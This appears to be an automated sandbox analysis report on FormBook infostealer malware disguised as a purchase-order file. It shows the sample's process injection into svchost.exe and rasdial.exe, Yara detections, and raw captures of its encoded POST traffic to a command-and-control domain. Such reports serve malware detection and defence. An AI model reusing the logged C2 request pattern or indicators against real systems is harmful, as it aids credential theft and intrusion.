                                                                    Oct 30, 2024 04:59:21.101171017 CET1236INHTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Wed, 30 Oct 2024 03:59:21 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=12f92c7b-b994-4e80-9cff-9f2ac4bd3adc;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=12f92c7b-b994-4e80-9cff-9f2ac4bd3adc;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Oct 30, 2024 04:59:21.101231098 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    42192.168.2.550024136.143.186.1280
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:59:23.244004965 CET750OUTPOST /1q08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.lanxuanz.tech
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 56 70 63 76 2f 43 66 49 5a 58 42 31 70 78 73 2b 72 79 49 33 71 75 68 39 75 50 71 4b 31 64 70 70 44 6e 53 4f 6e 31 50 4c 4d 43 6b 56 6f 78 72 56 41 44 32 6a 77 72 6f 4d 58 34 35 48 6e 32 37 50 30 4c 4b 32 4b 2f 37 39 69 62 70 57 73 35 65 4e 2f 4a 67 44 78 45 61 4b 65 58 34 78 71 45 54 36 74 46 76 46 61 6a 50 4f 79 76 46 39 6e 72 52 61 61 38 79 79 56 71 36 54 59 45 4a 4b 2b 7a 75 36 65 4d 67 35 4d 72 33 75 7a 37 53 63 63 56 53 71 35 4a 41 46 72 61 38 76 49 74 70 4f 43 78 34 52 50 39 59 42 72 71 78 6d 47 55 5a 50 63 67 34 72 38 78 50 6d 35 32 62 76 4b 67 4b 5a 67 30 75 30 30 54 67 53 59 79 62 37 32 35 73 4a 69 4d 43
                                                                    Data Ascii: vxPD=pTM1zeR2SjipbVpcv/CfIZXB1pxs+ryI3quh9uPqK1dppDnSOn1PLMCkVoxrVAD2jwroMX45Hn27P0LK2K/79ibpWs5eN/JgDxEaKeX4xqET6tFvFajPOyvF9nrRaa8yyVq6TYEJK+zu6eMg5Mr3uz7SccVSq5JAFra8vItpOCx4RP9YBrqxmGUZPcg4r8xPm52bvKgKZg0u00TgSYyb725sJiMC
                                                                    Oct 30, 2024 04:59:23.993429899 CET1236INHTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Wed, 30 Oct 2024 03:59:23 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=af26ecaa-39f6-4ade-8038-a59a6d21dc2f;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=af26ecaa-39f6-4ade-8038-a59a6d21dc2f;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Oct 30, 2024 04:59:23.993485928 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:23:55:15
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\Purchase_Order_pdf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase_Order_pdf.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'327'231 bytes
                                                                    MD5 hash:0E51B97A594AA2F1756261A47A695484
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:23:55:17
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase_Order_pdf.exe"
                                                                    Imagebase:0x9b0000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:23:55:47
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:5
                                                                    Start time:23:55:49
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                                    Imagebase:0xf00000
                                                                    File size:19'456 bytes
                                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:23:56:02
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:8
                                                                    Start time:23:56:14
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff79f9e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    No disassembly